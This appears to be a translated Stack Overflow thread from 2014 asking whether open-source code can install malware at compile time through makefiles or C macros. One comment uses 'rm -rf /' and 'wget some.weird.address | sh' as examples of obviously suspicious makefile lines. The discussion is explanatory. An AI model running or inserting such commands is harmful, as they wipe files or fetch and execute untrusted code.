【发布时间】:2014-08-09 09:48:41
【问题描述】:
假设开源程序可以在编译时安装恶意软件吗?我正在考虑将在编译时执行邪恶代码的 C 宏或 makefile 相关的东西。或者,只要我不开始运行已编译的程序,我就安全?
【问题讨论】:
-
从技术上讲,make 文件在构建目标时可以运行它有权执行的任何命令,但考虑到任何人都可以打开 Makefile 来查看它在做什么,这将是一种奇怪且毫无意义的恶意软件传递方式。
-
C 宏不能修改任何东西。
-
@Linuxios 这比最初以源代码形式分发恶意软件更没有意义,因为任何人都可以打开源代码来查看它在做什么?
-
@Barmar:因为至少在源代码中,您可能必须在数千行代码中找到它,而某些内容可能并不明显。 Makefiles 很短,并且只能使用已安装的命令和程序,如果您已经安装了恶意软件,那有什么意义,如果您还没有,很明显
rm -rf /或wget some.weird.address | sh(这不是真正的命令,但无论如何)不属于生成文件。 -
@Linuxios: scienceblogs.com/goodmath/2007/04/15/…
标签: c compilation malware